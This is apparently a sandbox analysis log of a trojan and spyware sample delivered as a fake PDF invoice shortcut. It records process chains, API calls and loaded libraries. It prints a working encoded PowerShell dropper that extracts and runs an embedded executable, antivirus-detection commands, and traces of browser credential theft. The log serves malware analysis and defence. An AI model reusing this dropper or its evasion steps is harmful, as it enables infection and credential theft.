        Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winLNK@41/52@3/2
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_0031A6AD GetLastError,FormatMessageW,13_2_0031A6AD
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_00308DE9 AdjustTokenPrivileges,CloseHandle,13_2_00308DE9
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_00309399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,13_2_00309399
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_00308DE9 AdjustTokenPrivileges,CloseHandle,15_2_00308DE9
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_00309399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,15_2_00309399
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_00938DE9 AdjustTokenPrivileges,CloseHandle,17_2_00938DE9
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_00939399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,17_2_00939399
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeCode function: 3_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,3_2_004044A5
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_00314148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,13_2_00314148
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeCode function: 3_2_004024FB CoCreateInstance,3_2_004024FB
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_0031443D FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,13_2_0031443D
        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fejhsitJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1432:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_afal0ypf.dst.ps1Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Coffee Coffee.bat & Coffee.bat
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: F42C.tmp.18.drBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
        Source: F255.tmp.18.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: F519.tmp.18.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
        Source: invoice_template.pdf.lnkReversingLabs: Detection: 13%
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e JABiADYANAAgAD0AIABAACgAUwBlAGwAZQBjAHQALQBTAHQAcgBpAG4AZwAgAC0AUABhAHQAdABlAHIAbgAgACIAYQBEAHUAYwBrACIAIAAtAFAAYQB0AGgAIAAuAFwAaQBuAHYAbwBpAGMAZQBfAHQAZQBtAHAAbABhAHQAZQAuAHAAZABmAC4AbABuAGsAKQAuAEwAaQBuAGUAIAAtAHIAZQBwAGwAYQBjAGUAIAAnAGEARAB1AGMAawAnADsAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABlAG4AdgA6AHQAZQBtAHAAXAB3AGkAbgBwAGQAZgAuAGUAeABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlACAALQBWAGEAbAB1AGUAIABAACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgA2ADQAKQApADsAIABpAG4AdgBvAGsAZQAtAGkAdABlAG0AIAAkAGUAbgB2ADoAdABlAG0AcABcAHcAaQBuAHAAZABmAC4AZQB4AGUA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\winpdf.exe "C:\Users\user\AppData\Local\Temp\winpdf.exe"
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Coffee Coffee.bat & Coffee.bat
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 367647
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Is + ..\Ashley + ..\Allan + ..\Span Y
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\367647\Productive.pif Productive.pif Y
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifProcess created: C:\Users\user\AppData\Local\Temp\367647\Productive.pif C:\Users\user\AppData\Local\Temp\367647\Productive.pif
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\fejhsit C:\Users\user\AppData\Roaming\fejhsit
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\winpdf.exe "C:\Users\user\AppData\Local\Temp\winpdf.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Coffee Coffee.bat & Coffee.batJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 367647Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Is + ..\Ashley + ..\Allan + ..\Span YJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\367647\Productive.pif Productive.pif YJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifProcess created: C:\Users\user\AppData\Local\Temp\367647\Productive.pif C:\Users\user\AppData\Local\Temp\367647\Productive.pifJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: wsock32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: napinsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: wshbth.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: nlaapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: winrnr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\choice.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: networkexplorer.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: uiautomationcore.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: provsvc.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: wsock32.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: version.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: winmm.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: mpr.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: wininet.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: userenv.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: edgegdi.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: dui70.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: duser.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: textinputframework.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: coreuicomponents.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: coremessaging.dll
        Source: C:\Users\user\AppData\Roaming\fejhsitSection loaded: ntmarta.dll
